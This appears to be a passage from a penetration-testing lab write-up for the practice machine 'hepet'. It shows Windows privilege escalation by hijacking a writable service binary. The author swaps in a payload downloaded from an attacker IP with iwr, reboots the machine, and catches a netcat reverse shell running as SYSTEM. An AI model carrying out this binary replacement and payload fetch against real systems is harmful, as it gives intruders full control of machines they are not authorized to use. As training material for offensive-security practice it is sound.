Binary Hijacking
There is a service running with SYSTEM privileges, and its associated binary is located in a directory where the current user, ela arwel, has full write access.
Since ela arwel has the SeShutdownPrivilege, this situation presents a security risk. An attacker with access to this user account could replace the service binary with a malicious executable. When the service is restarted either manually or during a system reboot, it will run with SYSTEM privileges, effectively granting the attacker full control over the system.
This misconfiguration can be exploited to achieve privilege escalation, allowing an unprivileged user to execute arbitrary code with the highest level of system permissions.
PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe veyon-service.exe.bak
PS C:\Users\Ela Arwel\Veyon> iwr -Uri http://192.168.45.153/veyon-service.exe -OutFile .\veyon-service.exeRenaming the original file and transferring the payload
PS C:\Users\Ela Arwel\Veyon> cmd /c shutdown /rRebooting
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.159.140] 49670
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
whoami
nt authority\system
C:\WINDOWS\system32> hostname
hostname
hepet
C:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.159.140
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.159.254System Level Compromise